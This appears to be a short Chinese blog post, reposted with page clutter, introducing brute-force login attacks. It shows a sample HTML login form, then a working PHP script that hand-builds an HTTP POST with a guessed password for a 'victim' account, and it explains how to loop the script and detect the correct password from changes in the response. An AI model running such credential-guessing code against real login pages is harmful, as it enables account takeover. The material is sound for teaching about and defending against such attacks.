暴力攻击 PHP 脚本 初探

考虑下面的HTML表单:

CODE:

<form action="http://example.org/login.php" method="POST">

<p>Username: <input type="text" name="username" /></p>

<p>Password: <input type="password" name="password" /></p>

<p><input type="submit" /></p>

</form>

 

攻击者会察看这个表单并建立一段脚本来POST合法的数据给http://example.org/login.php:

<?php

  $username = 'victim';
  $password = 'guess';

  $content = "username=$username&password=$password";
  $content_length = strlen($content);

  $http_request = '';
  $http_response = '';

  $http_request .= "POST /login.php HTTP/1.1\r\n";

  $http_request .= "Host: example.org\r\n";

  $http_request .= "Content-Type: application/x-www-form-urlencoded\r\n";

  $http_request .= "Content-Length: $content_length\r\n";

  $http_request .= "Connection: close\r\n";

  $http_request .= "\r\n";

  $http_request .= $content;

  if ($handle = fsockopen('example.org', 80))

  {

    fputs($handle, $http_request);

 

    while (!feof($handle))

    {

      $http_response .= fgets($handle, 1024);

    }

    fclose($handle);

    /* Check Response */

  }

  else

  {

    /* Error */

  }

  ?>

使这段脚本,攻击者还可以简单地加入一个循环来继续尝试不同的密码,并在每次尝试后检查$http_response变量。一旦$http_response变量有变化,就可以认为猜测到了正确的密码。

 

 

转载于:https://www.cnblogs.com/qunshu/p/3294114.html

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值